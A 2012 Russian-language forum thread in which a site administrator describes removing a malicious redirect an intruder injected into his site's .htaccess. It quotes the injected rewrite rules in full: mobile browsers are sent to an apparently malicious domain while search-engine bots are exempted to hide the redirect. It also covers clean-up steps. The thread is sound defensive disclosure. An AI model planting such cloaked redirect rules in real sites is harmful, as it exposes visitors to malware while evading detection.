Релокатор на сайте

Новости форума и др.
Ответить
Аватара пользователя
blackstrip
Админ
Сообщения: 1176
Зарегистрирован: Ср янв 02, 2008 1:42 pm
Откуда: Подольск
Контактная информация:

Релокатор на сайте

Сообщение blackstrip » Вт июл 03, 2012 12:10 am

ВНИМАНИЕ: по ссылкам, расположенным ниже, лазить не советую. Пока этот сайт вроде дохлый, но мало ли заработает, и кто нибудь что нибудь сможет оттуда подцепить.

Троян (если это дело можно обозвать трояном, скорее вредоносный скрипт) был успешно стерт.

Интересная штука. Обнаружился вчера, а сегодня был снесен.

В .htaccess корневого каталога blackstrip.ru дописал кто-то строки:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://googleapi14.ru/ero.php?l=1&r=4139&a=28 [L,R=302]

То бишь все что имело в юзер-агенте слова "android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone" - при попытке заходя на блэкстрип.ру перекидывалось на http://googleapi14.ru/ero.php?l=1&r=4139&a=28 (это дохлый неактивный сайт, но когда то наверное был рабочий)

googleapi##.ru бывает с разными числами вместо ##. Например, запрос гугла "googleapi16.ru" выдает кучу ссылок, по заходу на них аваст блокирует загрузку (типа тама троян-релокатор). Видимо их всех сделал один человек

А все что имело в юзер-агенте слова "accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer" спокойно проходило на сайт, и никуда не перекидывалось.

Так-то! Проверяйте свои .htaccess) и ставьте на них права пожощще, чтоб никто не дописывал в них ничего.

p.s. интересно это через форум или через скрипты дендиигр и галереи такие дела пролезают. как пишут докторвебовцы ( http://vms.drweb.com/virus+anatomy/?i=2136 ) :
Действует данная схема следующим образом: эксплуатируя уязвимости установленных на различных сайтах серверных приложений, таких как «движки» форумов и системы управления контентом (CMS), злоумышленники получают доступ к ресурсу и подменяют хранящийся на сервере файл .htaccess. В результате этих изменений при каждом обращении к взломанному сайту сервер проверяет user-agent пользователя, и в том случае, если клиентский браузер работает на мобильной платформе с поддержкой Java (в том числе Symbian OS и Android), происходит переадресация пользователя на принадлежащую злоумышленникам веб-страницу. Тут как раз эта самая тема.

Аватара пользователя
blackstrip
Админ
Сообщения: 1176
Зарегистрирован: Ср янв 02, 2008 1:42 pm
Откуда: Подольск
Контактная информация:

Re: Релокатор на сайте

Сообщение blackstrip » Вт июл 03, 2012 10:19 pm

По результатам проверки скриптов были заделаны несколько sql-дырок) и поставлено 444 на .htaccess

Ответить

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 4 гостя